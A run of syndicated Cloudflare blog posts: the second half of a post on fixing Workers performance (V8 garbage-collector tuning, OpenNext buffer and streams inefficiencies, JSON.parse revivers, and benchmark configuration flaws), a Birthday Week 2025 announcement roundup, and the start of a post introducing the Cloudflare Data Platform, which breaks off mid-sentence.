The range of issues that we uncovered in the framework code in these benchmarks repeatedly pointed at garbage collection and memory management issues as being key contributors to the results. But, we would expect these to be an issue with the same frameworks running in Node.js as well. To see exactly what was going on differently with Workers and why it was causing such a significant degradation in performance, we had to look inwards at our own memory management configuration.

The V8 garbage collector has a huge number of knobs that can be tuned that directly impact performance. One of these is the size of the “young generation”. This is where newly created objects go initially. It’s a memory area that’s less compact, but optimized for short-lived objects. When objects have bounced around the “young space” for a few generations they get moved to the old space, which is more compact, but requires more CPU to reclaim.

V8 allows the embedding runtime to tune the size of the young generation. And it turns out, we had done so. Way back in June of 2017, just two months after the Workers project kicked off, we – or specifically, I, Kenton, as I was the only engineer on the project at the time – had configured this value according to V8’s recommendations at the time for environments with 512MB of memory or less. Since Workers defaults to a limit of 128MB per isolate, this seemed appropriate.

V8’s entire garbage collector has changed dramatically since 2017. When analyzing the benchmarks, it became apparent that the setting which made sense in 2017 no longer made sense in 2025, and we were now limiting V8’s young space too rigidly. Our configuration was causing V8’s garbage collection to work harder and more frequently than it otherwise needed to. As a result, we have backed off on the manual tuning and now allow V8 to pick its young space size more freely, based on its internal heuristics. This is already live on Cloudflare Workers, and it has given an approximately 25% boost to the benchmarks with only a small increase in memory usage. Of course, the benchmarks are not the only Workers that benefit: all Workers should now be faster. That said, for most Workers the difference has been much smaller.

Tuning OpenNext for performance

The platform changes solved most of the problem. Following the changes, our testing showed we were now even on all of the benchmarks save one: Next.js.

Next.js is a popular web application framework which, historically, has not had built-in support for hosting on a wide range of platforms. Recently, a project called OpenNext has arisen to fill the gap, making Next.js work well on many platforms, including Cloudflare. On investigation, we found several missing optimizations and other opportunities to improve performance, explaining much of why the benchmark performed poorly on Workers.

Unnecessary allocations and copies

When profiling the benchmark code, we noticed that garbage collection was dominating the timeline: between 10% and 25% of the request processing time was being spent reclaiming memory.



So we dug in and discovered that OpenNext, and in some cases Next.js and React themselves, will often create unnecessary copies of internal data buffers at some of the worst times during request handling. For instance, there’s one pipeThrough() operation in the rendering pipeline that we saw creating no fewer than 50 2048-byte Buffer instances, whether they are actually used or not.

We further discovered that on every request, the Cloudflare OpenNext adapter has been needlessly copying every chunk of streamed output data as it’s passed out of the renderer and into the Workers runtime to return to users. Given this benchmark returns a 5 MB result on every request, that’s a lot of data being copied!

In other places, we found that arrays of internal Buffer instances were being copied and concatenated using Buffer.concat for no other reason than to get the total number of bytes in the collection. That is, we spotted code of the form getBody().length. The function getBody() would concatenate a large number of buffers into a single buffer and return it, without storing the buffer anywhere. So, all that work was being done just to read the overall length. Obviously this was not intended, and fixing it was an easy win.
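The difference is easy to see in isolation. In this minimal sketch, the function names are illustrative rather than OpenNext's code, and the body is assumed to be held as an array of Node.js Buffer chunks:

```javascript
// Wasteful: allocates a new buffer and copies every chunk into it, only to read its length.
function totalLengthViaConcat(chunks) {
  return Buffer.concat(chunks).length;
}

// Cheaper: sum the chunk lengths without allocating or copying anything.
function totalLength(chunks) {
  let total = 0;
  for (const chunk of chunks) total += chunk.byteLength;
  return total;
}
```

When the concatenated buffer really is needed, passing the precomputed total as the second argument of `Buffer.concat(list, totalLength)` at least saves Node.js from summing the lengths again.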

We’ve started opening a series of pull requests in OpenNext to fix these issues, and others in hot paths, removing some unnecessary allocations and copies:

We’re not done. We intend to keep iterating through the OpenNext code, making improvements wherever they’re needed, not only in the parts that run on Workers. Many of these improvements apply to other OpenNext platforms as well. The shared goal of OpenNext is to make Next.js as fast as possible regardless of where you choose to run your code.

Inefficient Streams Adapters

Much of the Next.js code was written to use Node.js’s APIs for byte streams. Workers, however, prefers the web-standard Streams API and uses it to represent HTTP request and response bodies. This necessitates adapters to convert between the two APIs. When investigating the performance bottlenecks, we found a number of places where inefficient streams adapters were being applied needlessly. For example:

const stream = Readable.toWeb(Readable.from(res.getBody()))

res.getBody() was performing a Buffer.concat(chunks) to copy the accumulated chunks of data into a new Buffer, which was then passed as an iterable into a Node.js stream.Readable, which in turn was wrapped by an adapter that returns a ReadableStream. While each of these utilities serves a useful purpose, chained together they become a data-buffering nightmare, since Node.js streams and Web streams each apply their own internal buffers! Instead we can simply do:

const stream = ReadableStream.from(chunks);

This returns a ReadableStream directly from the accumulated chunks without additional copies, extraneous buffering, or passing everything through inefficient adaptation layers.

In other places we see that Next.js and React make extensive use of ReadableStream to pass bytes through, but the streams being created are value-oriented rather than byte-oriented! For example,

const readable = new ReadableStream({
  pull(controller) {
    controller.enqueue(chunks.shift());
    if (chunks.length === 0) {
      controller.close();
    }
  },
});  // Default highWaterMark is 1!

Seems perfectly reasonable. However, there’s an issue here. If the chunks are Buffer or Uint8Array instances, every instance ends up being a separate read by default. So whether a chunk is a single byte or 1000 bytes, it still costs a full read of its own. By converting this to a byte stream with a reasonable highWaterMark, we can make it possible to read this stream much more efficiently:

const readable = new ReadableStream({
  type: 'bytes',
  pull(controller) {
    controller.enqueue(chunks.shift());
    if (chunks.length === 0) {
      controller.close();
    }
  },
}, { highWaterMark: 4096 });  // For byte streams, highWaterMark is measured in bytes

Now the stream can be read as a stream of bytes rather than a stream of distinct JavaScript values, and the individual chunks can be coalesced internally into 4096-byte chunks, making reads much more efficient. Rather than handing over each enqueued chunk one at a time, the ReadableStream will proactively call pull() repeatedly until the highWaterMark is reached, so reads do not have to ask the stream for one chunk of data at a time.
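The proactive pulling can be observed directly. This minimal sketch, assuming a runtime with WHATWG byte streams (for example Node.js 18+), counts how many times pull() runs before anything reads from the stream. makeChunks and countPulls are hypothetical helpers; the sketch shows only the prefetching behavior, not how a consumer coalesces reads.

```javascript
// Ten 1000-byte chunks. Each gets its own ArrayBuffer because byte streams
// transfer (detach) the buffer of every chunk that is enqueued.
function makeChunks() {
  return Array.from({ length: 10 }, () => new Uint8Array(1000));
}

// Build a stream over the chunks and count pull() calls made before any read.
async function countPulls(useByteStream) {
  const chunks = makeChunks();
  let pulls = 0;
  const source = {
    pull(controller) {
      pulls++;
      controller.enqueue(chunks.shift());
      if (chunks.length === 0) controller.close();
    },
  };
  if (useByteStream) {
    source.type = 'bytes';
    new ReadableStream(source, { highWaterMark: 4096 }); // buffer up to ~4096 bytes
  } else {
    new ReadableStream(source); // value stream: default highWaterMark of 1 chunk
  }
  // Let the start/pull promise chain settle (it runs entirely on microtasks).
  await new Promise((resolve) => setTimeout(resolve, 0));
  return pulls;
}
```

With these 1000-byte chunks, the value stream should stop after a single pull, while a spec-conforming byte stream keeps pulling until at least 4096 bytes are buffered (five pulls).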

Ideally, the rendering pipeline would use byte streams and pay closer attention to backpressure signals, but our implementation can still be tuned to better handle cases like this.

The bottom line? We’ve got some work to do! There are a number of improvements to make in the implementation of OpenNext and the adapters that allow it to work on Cloudflare, which we will continue to investigate and iterate on. We’ve made a handful of these fixes already and are seeing improvements. Soon we also plan to start submitting patches to Next.js and React to make further improvements upstream that will ideally benefit the entire ecosystem.

JSON parsing

Aside from buffer allocations and streams, one additional item stood out like a sore thumb in the profiles: JSON.parse() with a reviver function. Both React and Next.js use it, and in our profiling it was significantly slower than it should be. We built a microbenchmark and found that JSON.parse with a reviver argument recently got even slower when the standard added a third argument to the reviver callback to provide access to the JSON source context.

For those unfamiliar with the reviver function, it lets an application customize how JSON is parsed. But it has drawbacks: the function is called on every key-value pair in the JSON structure, including every individual element of a serialized Array. In Theo’s Next.js benchmark, it ends up being called well over 100,000 times in a single request!
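To see why the call count grows so quickly, this small sketch counts reviver invocations with an identity reviver. countReviverCalls is a hypothetical helper for illustration; the calling behavior it exercises is the standard JSON.parse one.

```javascript
// Count how many times JSON.parse invokes a reviver.
function countReviverCalls(json) {
  let calls = 0;
  JSON.parse(json, (key, value) => {
    calls++;
    return value; // identity reviver: every value is returned unchanged
  });
  return calls;
}

// One call per array element, one per object property, plus a final call
// for the root value (with key "").
console.log(countReviverCalls('{"a":[1,2,3],"b":{"c":4}}')); // 7

// A single 100,000-element array already costs 100,001 reviver calls.
console.log(countReviverCalls(JSON.stringify(new Array(100000).fill(0)))); // 100001
```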

Even though this problem affects all platforms, not just ours, we decided we weren’t going to just accept it. After all, we have V8 contributors on the Workers runtime team! We’ve upstreamed a V8 patch that can speed up JSON.parse() with revivers by roughly 33 percent. It should be in V8 starting with version 14.3 (Chrome 143) and can help everyone using V8, not just Cloudflare: Node.js, Chrome, Deno, the entire ecosystem. Until then, if you are not using Cloudflare Workers or haven’t changed the syntax of your reviver, you are paying the slower, unpatched cost.

We will continue to work with framework authors to reduce overhead in hot paths. Some changes belong in the frameworks, some belong in the engine, some in our platform.

Node.js’s trigonometry problem

We are engineers, and we like to solve engineering problems — whether our own, or for the broader community.

Theo’s benchmarks were actually posted in response to a different benchmark by another author which compared Cloudflare Workers against Vercel. The original benchmark focused on calling trigonometry functions (e.g. sine and cosine) in a tight loop. In this benchmark, Cloudflare Workers performed 3x faster than Node.js running on Vercel.
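For readers who haven’t seen it, here is a minimal sketch of the kind of tight trigonometry loop such a benchmark times. It is not the original benchmark’s code; trigLoop and the iteration count are illustrative.

```javascript
// Time a tight loop of Math.sin/Math.cos calls.
function trigLoop(iterations) {
  const start = performance.now();
  let sum = 0;
  for (let i = 0; i < iterations; i++) {
    // Math.sin and Math.cos are implemented by V8, not by the host runtime,
    // so their speed depends on how V8 itself was compiled.
    sum += Math.sin(i) * Math.cos(i);
  }
  return { sum, ms: performance.now() - start };
}

const { sum, ms } = trigLoop(1_000_000);
console.log(`sum=${sum.toFixed(4)} in ${ms.toFixed(1)} ms`);
```

Since the loop does almost nothing but call the math functions, any difference in how V8 was built to implement them shows up directly in the timing.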

The author of the original benchmark offered this as evidence that Cloudflare Workers are just faster. Theo disagreed, and so did we. We expect to be faster, but not by 3x! We don’t implement math functions ourselves; these come with V8. We weren’t happy to just accept the win, so we dug in.

It turns out that Node.js is not using the latest, fastest path for these functions. Node.js can be built with either the clang or gcc compilers, and is written to support a broader range of operating systems and architectures than Workers. As a result, Node.js builds often settle on a lowest common denominator in order to support the broadest range of platforms. V8 includes a compile-time flag that, in some configurations, allows it to use a faster implementation of the trig functions. In Workers, mostly by coincidence, that flag is enabled by default; in Node.js, it is not. We’ve opened a pull request to enable the flag in Node.js so that everyone benefits, at least on platforms where it can be supported.

Assuming that lands, and once AWS Lambda and Vercel are able to pick it up, we expect this specific gap to go away, making these operations faster for everyone. This change won’t benefit our customers, since Cloudflare Workers already uses the faster trig functions, but a bug is a bug and we like making everything faster.

Benchmarks are hard

Even the best benchmarks have bias and tradeoffs. It’s difficult to create a benchmark that is truly representative of real-world performance, and all too easy to misinterpret the results of benchmarks that are not. We particularly liked PlanetScale’s take on this subject.

These specific CPU-bound tests are not an ideal choice to represent web applications. Theo even notes this in his video. Most real-world applications on Workers and Vercel are bound by databases, downstream services, network, and page size. End user experience is what matters. CPU is one piece of that picture. That said, if a benchmark shows us slower, we take it seriously.

While the benchmarks helped us find and fix many real problems, we also found a few problems with the benchmarks themselves, which contributed to the apparent disparity in speed:

Running locally

The benchmark is designed to be run on your laptop, from which it hits Cloudflare’s and Vercel’s servers over the Internet. It makes the assumption that latency observed from the client is a close enough approximation of server-side CPU time. The reasons are fair: As Theo notes, Cloudflare does not permit an application to measure its own CPU time, in order to prevent timing side channel attacks. Actual CPU time can be seen in logs after the fact, but gathering those may be a lot of work. It’s just easier to measure time from the client.

However, as Cloudflare and Vercel are hosted from different data centers, the network latency to each can be a factor in the benchmark, and this can skew the results. Typically, this effect will favor Cloudflare, because Cloudflare can run your Worker in locations spread across 330+ cities worldwide, and will tend to choose the closest one to you. Vercel, on the other hand, usually places compute in a central location, so latency will vary depending on your distance from that location.

For our own testing, to minimize this effect, we ran the benchmark client from a VM on AWS located in the same data center as our Vercel instances. Since Cloudflare is well-connected to every AWS location, we think this should have eliminated network latency from the picture. We chose AWS’s us-east-1 / Vercel’s iad1 for our test as it is widely seen as the default choice; any other choice could draw questions about cherry-picking.

Not all CPUs are equal

Cloudflare’s servers aren’t all identical. Although we refresh them aggressively, there will always be multiple generations of hardware in production at any particular time. Currently, this includes generations 10, 11, and 12 of our server hardware.

Other cloud providers are no different. No cloud provider simply throws away all their old servers every time a new version becomes available.

Of course, newer CPUs run faster, even for single-threaded workloads. The differences are not as large as they used to be 20-30 years ago, but they are not nothing. As such, an application may get (a little bit) lucky or unlucky depending on what machine it is assigned to.

In cloud environments, even identical CPUs can yield different performance depending on circumstances, due to multitenancy. The server your application is assigned to is running many others as well. In AWS Lambda, a server may be running hundreds of applications; in Cloudflare, with our ultra-efficient runtime, a server may be running thousands. These “noisy neighbors” won’t share the same CPU core as your app, but they may share other resources, such as memory bandwidth. As a result, performance can vary.

It’s important to note that these problems create correlated noise. That is, if you run the test again, the application is likely to remain assigned to the same machines as before – this is true of both Cloudflare and Vercel. So, this noise cannot be corrected by simply running more iterations. To correct for this type of noise on Cloudflare, one would need to initiate requests from a variety of geographic locations, in order to hit different Cloudflare data centers and therefore different machines. But, that is admittedly a lot of work. (We are not familiar with how best to get an application to switch machines on Vercel.)
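A toy simulation makes the correlated-noise point concrete. Every number in it is invented; the sketch only shows why averaging more requests that all land on the same machine converges to that machine’s speed (about 112 ms for machine 2 here) rather than to the fleet average. The small seeded PRNG keeps the run reproducible.

```javascript
// Small mulberry32-style seeded PRNG returning floats in [0, 1).
function mulberry32(seed) {
  return function () {
    seed = (seed + 0x6d2b79f5) | 0;
    let t = Math.imul(seed ^ (seed >>> 15), 1 | seed);
    t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

const rand = mulberry32(42);
const BASE_MS = 100;                  // hypothetical fleet-average latency
const machineOffsetsMs = [-8, 0, 12]; // hypothetical per-machine speed differences

// Every request in a run lands on the same machine, so its offset never averages out;
// only the uncorrelated per-request jitter shrinks as the request count grows.
function meanLatency(machine, requests) {
  let total = 0;
  for (let i = 0; i < requests; i++) {
    const perRequestNoise = (rand() - 0.5) * 20; // uncorrelated jitter, +/-10 ms
    total += BASE_MS + machineOffsetsMs[machine] + perRequestNoise;
  }
  return total / requests;
}

console.log(meanLatency(2, 10000).toFixed(1));
```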

A Next.js config bug

The Cloudflare version of the Next.js benchmark was not configured to use force-dynamic, while the Vercel version was. This triggered curious behavior. Our understanding is that pages which are not “dynamic” should normally be rendered statically at build time. With OpenNext, however, it appears the pages are still rendered dynamically, but if multiple requests for the same page are received at the same time, OpenNext will only invoke the rendering once. Before we fixed our scheduling algorithm to avoid sending too many requests to the same isolate, this behavior may have partially counteracted that problem. Theo reports that he disabled force-dynamic in the Cloudflare version for exactly this reason: with it on, our results were so bad that they appeared outright broken.
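The “render once for concurrent requests” behavior is a form of request coalescing, sometimes called single-flight. The sketch below is a generic illustration of that pattern, not OpenNext’s implementation; renderOnce and the inFlight map are hypothetical.

```javascript
// Concurrent requests for the same key share one in-flight render.
const inFlight = new Map();

function renderOnce(key, render) {
  let pending = inFlight.get(key);
  if (!pending) {
    // The first caller starts the render. The entry is removed once the render
    // settles, so later (non-concurrent) requests trigger a fresh render.
    pending = Promise.resolve()
      .then(render)
      .finally(() => inFlight.delete(key));
    inFlight.set(key, pending);
  }
  return pending;
}
```

Two requests for "/" arriving together both await the same promise and receive the same output, while the render function runs only once.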

Ironically, though, once we fixed the scheduling issue, using “static” rendering (i.e. not enabling force-dynamic) hurt Cloudflare’s performance for other reasons. It seems that when OpenNext renders a “cacheable” page, streaming of the response body is inhibited. This interacted poorly with a property of the benchmark client: it measured time-to-first-byte (TTFB), rather than total request/response time. When running in dynamic mode – as the test did on Vercel – the first byte would be returned to the client before the full page had been rendered. The rest of the rendering would happen as bytes streamed out. But with OpenNext in non-dynamic mode, the entire payload was rendered into a giant buffer upfront, before any bytes were returned to the client.

Because the benchmark client measures TTFB, in dynamic mode the benchmark does not actually measure the time needed to fully render the page. We became suspicious when we noticed that Vercel’s observability tools reported more CPU time than the benchmark itself had measured.

One option would have been to change the benchmarks to use time-to-last-byte (TTLB) instead, that is, to wait until the last byte is received before stopping the timer. However, this would make the benchmark even more sensitive to network differences: the responses are quite large, ranging from 2 MB to 15 MB, so the results could vary with the bandwidth to each provider. This would indeed tend to favor Cloudflare, but since the point of the test is to measure CPU speed, not bandwidth, it would be an unfair advantage.
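The difference between the two measurements can be sketched as follows. timeBody is a hypothetical helper, and it assumes “first byte” means the first chunk of the response body; a client that stops its timer when the response headers arrive would report an even earlier TTFB.

```javascript
// Time-to-first-byte vs time-to-last-byte for a response body stream.
// `start` should be taken just before the request is sent.
async function timeBody(body, start) {
  const reader = body.getReader();
  let ttfbMs = null;
  let bytes = 0;
  for (;;) {
    const { value, done } = await reader.read();
    if (done) break;
    if (ttfbMs === null) ttfbMs = performance.now() - start; // first body chunk arrived
    bytes += value.byteLength;
  }
  return { ttfbMs, ttlbMs: performance.now() - start, bytes };
}

// Usage against a real server (the URL is a placeholder):
//   const start = performance.now();
//   const res = await fetch('https://example.com/');
//   console.log(await timeBody(res.body, start));
```

For a streamed, multi-megabyte page, ttfbMs can be reached long before rendering finishes, which is why a TTFB-only client never sees most of the rendering cost.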

Once we changed the Cloudflare version of the test to use force-dynamic as well, matching the Vercel version, the streaming behavior matched too, making the comparison fair. This means neither version actually measures the cost of rendering the full page to HTML, but at least both now measure the same thing.

As a side note, the original behavior allowed us to spot that OpenNext has a couple of performance bottlenecks in its implementation of the composable cache it uses to deduplicate rendering requests. While fixes to these aren’t going to impact the numbers for this particular set of benchmarks, we’re working on improving those pieces also.

A React SSR config bug

The React SSR benchmark contained a more basic configuration error. React inspects the environment variable NODE_ENV to decide whether the environment is “production” or a development environment. Many Node.js-based environments, including Vercel, set this variable automatically in production. Many frameworks, such as OpenNext, automatically set this variable for Workers in production as well. However, the React SSR benchmark was written against lower-level React APIs, not using any framework. In this case, the NODE_ENV variable wasn’t being set at all.

And, unfortunately, when NODE_ENV is not set, React defaults to “dev mode”, a mode that contains extra debugging checks and is therefore much slower than production mode. As a result, the numbers for Workers were much worse than they should have been.
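React’s published packages choose between their production and development builds with an entry-point check along these lines. This is a simplified, hypothetical sketch of that pattern, not React’s source: anything other than exactly "production", including an unset variable, selects the slower development build.

```javascript
// Mirrors the entry-point pattern: only the exact string "production"
// selects the production build; everything else falls back to development.
function selectBuild(env) {
  return env.NODE_ENV === 'production' ? 'production' : 'development';
}

console.log(selectBuild({}));                         // development
console.log(selectBuild({ NODE_ENV: 'production' })); // production
```

In a framework-less setup, the fix is to make sure NODE_ENV is set before React is loaded, or to have the bundler replace process.env.NODE_ENV at build time.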

Arguably, it may make sense for Workers to set this variable automatically for all deployed workers, particularly when Node.js compatibility is enabled. We are looking into doing this in the future, but for now we’ve updated the test to set it directly.

What we’re going to do next

Our improvements to the Workers Runtime are already live for all workers, so you do not need to change anything. Many apps will already see faster, steadier tail latency on compute-heavy routes, with less jitter during bursts. In places where garbage collection improved, some workloads will also use fewer billed CPU seconds.

We also sent Theo a pull request to update OpenNext with our improvements there, and with other test fixes.

But we’re far from done. We still have work to do to close the gap between OpenNext and Next.js on Vercel – but given the other benchmark results, it’s clear we can get there. We also have plans for further improvements to our scheduling algorithm, so that requests almost never block each other. We will continue to improve V8, and even Node.js – the Workers team employs multiple core contributors to each project. Our approach is simple: improve open source infrastructure so that everyone gets faster, then make sure our platform makes the most of those improvements.

And, obviously, we’ll be writing more benchmarks, to make sure we’re catching these kinds of issues ourselves in the future. If you have a benchmark that shows Workers being slower, send it to us with a repro. We will profile it, fix what we can upstream, and share back what we learn!

15 years of helping build a better Internet: a look back at Birthday Week 2025

Post Syndicated from Nikita Cano original https://blog.cloudflare.com/birthday-week-2025-wrap-up/

Cloudflare launched fifteen years ago with a mission to help build a better Internet. Over that time the Internet has changed, and so has what it needs from teams like ours. In this year’s Founder’s Letter, Matthew and Michelle discussed the role we have played in the evolution of the Internet, from helping encryption grow from 10% to 95% of Internet traffic to more recent challenges like how people consume content.

We spend Birthday Week every year releasing the products and capabilities we believe the Internet needs at this moment and around the corner. Previous Birthday Weeks saw the launch of IPv6 gateway in 2011, Universal SSL in 2014, Cloudflare Workers and unmetered DDoS protection in 2017, Cloudflare Radar in 2020, R2 Object Storage with zero egress fees in 2021, post-quantum upgrades for Cloudflare Tunnel in 2022, Workers AI and Encrypted Client Hello in 2023. And those are just a sample of the launches.

This year’s themes focused on helping prepare the Internet for a new model of monetization that encourages great content to be published, fostering more opportunities to build community both inside and outside of Cloudflare, and evergreen missions like making more features available to everyone and constantly improving the speed and security of what we offer.

We shipped a lot of new things this year. In case you missed the dozens of blog posts, here is a breakdown of everything we announced during Birthday Week 2025. 

Monday, September 22

What

In a sentence …

Help build the future: announcing Cloudflare’s goal to hire 1,111 interns in 2026

To invest in the next generation of builders, we announced our most ambitious intern program yet with a goal to hire 1,111 interns in 2026.

Supporting the future of the open web: Cloudflare is sponsoring Ladybird and Omarchy

To support a diverse and open Internet, we are now sponsoring Ladybird (an independent browser) and Omarchy (an open-source Linux distribution and developer environment).

Come build with us: Cloudflare’s new hubs for startups

We are opening our office doors in four major cities (San Francisco, Austin, London, and Lisbon) as free hubs for startups to collaborate and connect with the builder community.

Free access to Cloudflare developer services for non-profit and civil society organizations

We extended our Cloudflare for Startups program to non-profits and public-interest organizations, offering free credits for our developer tools.

Introducing free access to Cloudflare developer features for students

We are removing cost as a barrier for the next generation by giving students with .edu emails 12 months of free access to our paid developer platform features.

Cap’n Web: a new RPC system for browsers and web servers

We open-sourced Cap’n Web, a new JavaScript-native RPC protocol that simplifies powerful, schema-free communication for web applications.

A lookback at Workers Launchpad and a warm welcome to Cohort #6

We announced Cohort #6 of the Workers Launchpad, our accelerator program for startups building on Cloudflare.

Tuesday, September 23

What

In a sentence …

Building unique, per-customer defenses against advanced bot threats in the AI era

New anomaly detection system that uses machine learning trained on each zone to build defenses against AI-driven bot attacks. 

Why Cloudflare, Netlify, and Webflow are collaborating to support Open Source tools

To support the open web, we joined forces with Webflow to sponsor Astro, and with Netlify to sponsor TanStack.

Launching the x402 Foundation with Coinbase, and support for x402 transactions

We are partnering with Coinbase to create the x402 Foundation, encouraging the adoption of the x402 protocol to allow clients and services to exchange value on the web using a common language.

Helping protect journalists and local news from AI crawlers with Project Galileo

We are extending our free Bot Management and AI Crawl Control services to journalists and news organizations through Project Galileo.

Cloudflare Confidence Scorecards – making AI safer for the Internet

Automated evaluation of AI and SaaS tools, helping organizations to embrace AI without compromising security.

Wednesday, September 24

What

In a sentence …

Automatically Secure: how we upgraded 6,000,000 domains by default

Our Automatic SSL/TLS system has upgraded over 6 million domains to more secure encryption modes by default and will soon automatically enable post-quantum connections.

Giving users choice with Cloudflare’s new Content Signals Policy

The Content Signals Policy is a new standard for robots.txt that lets creators express clear preferences for how AI can use their content.

To build a better Internet in the age of AI, we need responsible AI bot principles

A proposed set of responsible AI bot principles to start a conversation around transparency and respect for content creators’ preferences.

Securing data in SaaS to SaaS applications

New security tools to give companies visibility and control over data flowing between SaaS applications.

Securing today for the quantum future: WARP client now supports post-quantum cryptography (PQC)

Cloudflare’s WARP client now supports post-quantum cryptography, providing quantum-resistant encryption for traffic. 

A simpler path to a safer Internet: an update to our CSAM scanning tool

We made our CSAM Scanning Tool easier to adopt by removing the need to create and provide unique credentials, helping more site owners protect their platforms.

Thursday, September 25

What

In a sentence …

Every Cloudflare feature, available to everyone

We are making every Cloudflare feature, starting with Single Sign On (SSO), available for anyone to purchase on any plan. 

Cloudflare’s developer platform keeps getting better, faster, and more powerful

Updates across Workers and beyond for a more powerful developer platform – such as support for larger and more concurrent Container images, support for external models from OpenAI and Anthropic in AI Search (previously AutoRAG), and more. 

Partnering to make full-stack fast: deploy PlanetScale databases directly from Workers

You can now connect Cloudflare Workers to PlanetScale databases directly, with connections automatically optimized by Hyperdrive.

Announcing the Cloudflare Data Platform

A complete solution for ingesting, storing, and querying analytical data tables using open standards like Apache Iceberg. 

R2 SQL: a deep dive into our new distributed query engine

A technical deep dive on R2 SQL, a serverless query engine for petabyte-scale datasets in R2.

Safe in the sandbox: security hardening for Cloudflare Workers

A deep-dive into how we’ve hardened the Workers runtime with new defense-in-depth security measures, including V8 sandboxes and hardware-assisted memory protection keys.

Choice: the path to AI sovereignty

To champion AI sovereignty, we’ve added locally-developed open-source models from India, Japan, and Southeast Asia to our Workers AI platform.

Announcing Cloudflare Email Service’s private beta

We announced the Cloudflare Email Service private beta, allowing developers to reliably send and receive transactional emails directly from Cloudflare Workers.

A year of improving Node.js compatibility in Cloudflare Workers

There are hundreds of new Node.js APIs now available that make it easier to run existing Node.js code on our platform. 

Friday, September 26

What

In a sentence …

Cloudflare just got faster and more secure, powered by Rust

We have re-engineered our core proxy with a new modular, Rust-based architecture, cutting median response time by 10ms for millions. 

Introducing Observatory and Smart Shield

New monitoring tools in the Cloudflare dashboard that provide actionable recommendations and one-click fixes for performance issues.

Monitoring AS-SETs and why they matter

Cloudflare Radar now includes Internet Routing Registry (IRR) data, allowing network operators to monitor AS-SETs to help prevent route leaks.

An AI Index for all our customers

We announced the private beta of AI Index, a new service that creates an AI-optimized search index for your domain that you control and can monetize.

Introducing new regional Internet traffic and Certificate Transparency insights on Cloudflare Radar

Sub-national traffic insights and Certificate Transparency dashboards for TLS monitoring.

Eliminating Cold Starts 2: shard and conquer

We have reduced Workers cold starts by 10x by implementing a new “worker sharding” system that routes requests to already-loaded Workers.

Network performance update: Birthday Week 2025

The TCP Connection Time (Trimean) graph shows that we have the fastest TCP connection time in 40% of measured ISPs, and the fastest across the top networks.

How Cloudflare uses performance data to make the world’s fastest global network even faster

We are using our network’s vast performance data to tune congestion control algorithms, improving speeds by an average of 10% for QUIC traffic.

Come build with us!

Helping build a better Internet has always been about more than just technology. As our announcements about interns and shared office hubs show, the community of people helping build a better Internet matters to its future. This week, we rolled out our most ambitious set of initiatives ever to support the builders, founders, and students who are creating the future.

For founders and startups, we are thrilled to welcome Cohort #6 to the Workers Launchpad, our accelerator program that gives early-stage companies the resources they need to scale. But we’re not stopping there. We’re opening our doors, literally, by launching new physical hubs for startups in our San Francisco, Austin, London, and Lisbon offices. These spaces will provide access to mentorship, resources, and a community of fellow builders.

We’re also investing in the next generation of talent. We announced free access to the Cloudflare developer platform for all students, giving them the tools to learn and experiment without limits. To provide a path from the classroom to the industry, we also announced our goal to hire 1,111 interns in 2026 — our biggest commitment yet to fostering future tech leaders.

And because a better Internet is for everyone, we’re extending our support to non-profits and public-interest organizations, offering them free access to our production-grade developer tools, so they can focus on their missions.

Whether you’re a founder with a big idea, a student just getting started, or a team working for a cause you believe in, we want to help you succeed.

Until next year

Thank you to our customers, our community, and the millions of developers who trust us to help them build, secure, and accelerate the Internet. Your curiosity and feedback drive our innovation.

It’s been an incredible 15 years. And as always, we’re just getting started!

Announcing the Cloudflare Data Platform: ingest, store, and query your data directly on Cloudflare

Post Syndicated from Micah Wylde original https://blog.cloudflare.com/cloudflare-data-platform/

For Developer Week in April 2025, we announced the public beta of R2 Data Catalog, a fully managed Apache Iceberg catalog on top of Cloudflare R2 object storage. Today, we are building on that foundation with three launches:

  • Cloudflare Pipelines receives events sent via Workers or HTTP, transforms them with SQL, and ingests them into Iceberg or as files on R2

  • R2 Data Catalog manages the Iceberg metadata and now performs ongoing maintenance, including compaction, to improve query performance

  • R2 SQL is our in-house distributed SQL engine, designed to perform petabyte-scale queries over your data in R2

Together, these products make up the Cloudflare Data Platform, a complete solution for ingesting, storing, and querying analytical data tables.

Like all Cloudflare Developer Platform products, they run on our global compute infrastructure. They’re built around open standards and interoperability. That means that you can bring your own Iceberg query engine — whether that’s PyIceberg, DuckDB, or Spark — connect with other platforms like Databricks and Snowflake — and pay no egress fees to access your data.

Analytical data is critical for modern companies. It helps you understand your users’ behavior and your company’s performance, and it alerts you to issues. But traditional data infrastructure is expensive and hard to operate, requiring fixed cloud infrastructure and in-house expertise. We built the Cloudflare Data Platform to be easy enough for anyone to use, with affordable, usage-based pricing.

If you’re ready to get started now, follow the Data Platform tutorial for a step-by-step guide through creating a Pipeline that processes and delivers events to an R2 Data Catalog table, which can then be queried with R2 SQL. Or read on to learn about how we got here and how all of this works.

How did we end up building a Data Platform?

We launched R2 Object Storage in 2021 with a radical pricing strategy: no egress fees. Egress fees are the bandwidth charges traditional cloud providers levy to get data out, and they effectively hold your data for ransom. Eliminating them was possible because we had already built one of the largest global networks, interconnecting with thousands of ISPs, cloud services, and other enterprises.

Object storage powers a wide range of use cases, from media to static assets to AI training data. But over time, we’ve seen an increasing number of companies using open data and table formats to store their analytical data warehouses in R2.

The technology that enables this is Apache Iceberg. Iceberg is a table format, which provides database-like capabilities (including updates, ACID transactions, and schema evolution) on top of data files in object storage. In other words, it’s a metadata layer that tells clients which data files make up a particular logical table, what the schemas are, and how to efficiently query them.
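To make the idea of a metadata layer concrete, here is a deliberately simplified toy model. The field names are invented for illustration and are not Iceberg’s real metadata format; the sketch only shows how table metadata can point at the current snapshot’s data files, and how per-file min/max statistics let a client skip files that cannot match a query.

```javascript
// Toy table metadata: a schema, a current snapshot, and the data files per snapshot.
const tableMetadata = {
  schema: [{ name: 'ts', type: 'timestamp' }, { name: 'url', type: 'string' }],
  currentSnapshotId: 2,
  snapshots: {
    1: { dataFiles: [{ path: 'data/a.parquet', minTs: 0, maxTs: 99 }] },
    2: {
      dataFiles: [
        { path: 'data/a.parquet', minTs: 0, maxTs: 99 },
        { path: 'data/b.parquet', minTs: 100, maxTs: 199 },
      ],
    },
  },
};

// Resolve which data files a query over [fromTs, toTs] must read, using the
// per-file min/max statistics to prune files whose range cannot overlap.
function planScan(metadata, fromTs, toTs) {
  const snapshot = metadata.snapshots[metadata.currentSnapshotId];
  return snapshot.dataFiles
    .filter((f) => f.maxTs >= fromTs && f.minTs <= toTs)
    .map((f) => f.path);
}

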